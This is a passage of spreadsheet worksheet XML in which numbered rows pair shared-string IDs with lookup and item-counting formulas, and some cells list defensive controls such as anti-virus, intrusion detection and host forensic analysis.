        <v>1</v>
      </c>
      <c r="F87" s="50"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="16" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="45" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C88" s="17">
        <v>0</v>
      </c>
      <c r="D88" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E88" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F88" s="50"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="16" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="45" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C89" s="17">
        <v>100</v>
      </c>
      <c r="D89" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E89" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F89" s="50"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="16" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="45" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C90" s="17" t="s">
        <v>404</v>
      </c>
      <c r="D90" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E90" s="45">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F90" s="50"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="16" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="45" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C91" s="17">
        <v>0</v>
      </c>
      <c r="D91" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E91" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F91" s="50"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="16" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="45" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C92" s="17">
        <v>0</v>
      </c>
      <c r="D92" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E92" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F92" s="50"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="16" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="45" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C93" s="17">
        <v>0</v>
      </c>
      <c r="D93" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E93" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F93" s="50"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="16" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="45" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C94" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D94" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E94" s="45">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F94" s="50"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="16" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="45" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C95" s="17">
        <v>0</v>
      </c>
      <c r="D95" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E95" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F95" s="50"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="16" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="45" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C96" s="17">
        <v>0</v>
      </c>
      <c r="D96" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E96" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F96" s="50"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="16" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="45" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C97" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D97" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E97" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F97" s="50"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="16" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="45" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C98" s="17">
        <v>0</v>
      </c>
      <c r="D98" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E98" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="50"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="16" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="45" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C99" s="17">
        <v>0</v>
      </c>
      <c r="D99" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E99" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F99" s="50"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="16" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="45" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C100" s="17">
        <v>100</v>
      </c>
      <c r="D100" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E100" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F100" s="50"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="16" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="45" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C101" s="17">
        <v>0</v>
      </c>
      <c r="D101" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E101" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F101" s="50"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="16" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="45" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C102" s="17">
        <v>0</v>
      </c>
      <c r="D102" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E102" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F102" s="50"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="16" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="45" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C103" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D103" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E103" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F103" s="50"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="16" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="45" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C104" s="17">
        <v>0</v>
      </c>
      <c r="D104" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E104" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F104" s="50"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="16" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="45" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C105" s="17">
        <v>0</v>
      </c>
      <c r="D105" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E105" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F105" s="50"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="16" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="45" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C106" s="17">
        <v>0</v>
      </c>
      <c r="D106" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E106" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F106" s="50"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="45" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C107" s="17">
        <v>0</v>
      </c>
      <c r="D107" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E107" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F107" s="50"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="16" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="45" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C108" s="17">
        <v>100</v>
      </c>
      <c r="D108" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E108" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F108" s="50"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="16" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="45" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:H)</f>
        <v>Network intrusion detection system,Anti-virus</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D109" s="45">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E109" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F109" s="50"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="16" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="45" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:H)</f>
        <v>Network intrusion detection system,Anti-virus</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D110" s="45">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E110" s="45">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F110" s="50"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="16" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="45" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C111" s="17">
        <v>0</v>
      </c>
      <c r="D111" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E111" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="50"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="16" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="45" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C112" s="17">
        <v>0</v>
      </c>
      <c r="D112" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E112" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F112" s="50"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="16" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="45" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:H)</f>
        <v>Host forensic analysis</v>
      </c>
      <c r="C113" s="17">
        <v>100</v>
      </c>
      <c r="D113" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E113" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F113" s="50"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="45" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C114" s="17">
        <v>0</v>
      </c>
      <c r="D114" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E114" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F114" s="50"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="16" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="45" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C115" s="17">
        <v>0</v>
      </c>
      <c r="D115" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E115" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F115" s="50"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="16" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="45" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C116" s="17">
        <v>0</v>
      </c>
      <c r="D116" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="50"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="45" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="50"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="16" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="45" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C118" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D118" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E118" s="45">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F118" s="50"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="16" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="45" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C119" s="17">
        <v>100</v>
      </c>
      <c r="D119" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E119" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F119" s="50"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="45" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C120" s="17">
        <v>0</v>
      </c>
      <c r="D120" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E120" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F120" s="50"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="16" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="45" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E121" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="50"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="16" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="45" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C122" s="17">
        <v>100</v>
      </c>
      <c r="D122" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E122" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F122" s="50"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="45" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C123" s="17">
        <v>100</v>
      </c>
      <c r="D123" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E123" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F123" s="50"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="16" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="45" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C124" s="17">
        <v>0</v>
      </c>
      <c r="D124" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E124" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F124" s="50"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="16" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="45" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C125" s="17">
        <v>0</v>
      </c>
      <c r="D125" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E125" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F125" s="50"/>
      <c r="G125" s="19"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="16" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="45" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C126" s="17">
        <v>0</v>
      </c>
      <c r="D126" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E126" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F126" s="50"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="45" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C127" s="17">
        <v>100</v>
      </c>
      <c r="D127" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E127" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F127" s="50"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="16" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="45" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:H)</f>
        <v>Application control</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E128" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="50"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="45" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C129" s="17">
        <v>0</v>
      </c>
      <c r="D129" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E129" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F129" s="50"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="16" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="45" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C130" s="17">
        <v>0</v>
      </c>
      <c r="D130" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E130" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F130" s="50"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="45" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C131" s="17">
        <v>100</v>
      </c>
      <c r="D131" s="45">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E131" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F131" s="50"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="16" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="45" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C132" s="17">
        <v>0</v>
      </c>
      <c r="D132" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E132" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F132" s="50"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="16" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="45" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C133" s="17">
        <v>0</v>
      </c>
      <c r="D133" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E133" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F133" s="50"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="45" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C134" s="17">
        <v>0</v>
      </c>
      <c r="D134" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="50"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="16" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="45" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:H)</f>
        <v>Windows User Account Control,System access controls,File system access controls,Heuristic Detection,Host forensic analysis</v>
      </c>
      <c r="C135" s="17">
        <v>0</v>
      </c>
      <c r="D135" s="45">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E135" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F135" s="50"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="16" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="45" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C136" s="17">
        <v>0</v>
      </c>
      <c r="D136" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E136" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F136" s="50"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="45" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C137" s="17">
        <v>0</v>
      </c>
      <c r="D137" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E137" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F137" s="50"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="16" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="45" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C138" s="17">
        <v>0</v>
      </c>
      <c r="D138" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E138" s="45">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F138" s="50"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="16" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="45" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C139" s="17">
        <v>0</v>
      </c>
      <c r="D139" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E139" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F139" s="50"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="45" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C140" s="17">
        <v>0</v>
      </c>
      <c r="D140" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E140" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F140" s="50"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="16" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="45" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D141" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E141" s="45">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F141" s="50"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="45" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C142" s="17">
        <v>0</v>
      </c>
      <c r="D142" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E142" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
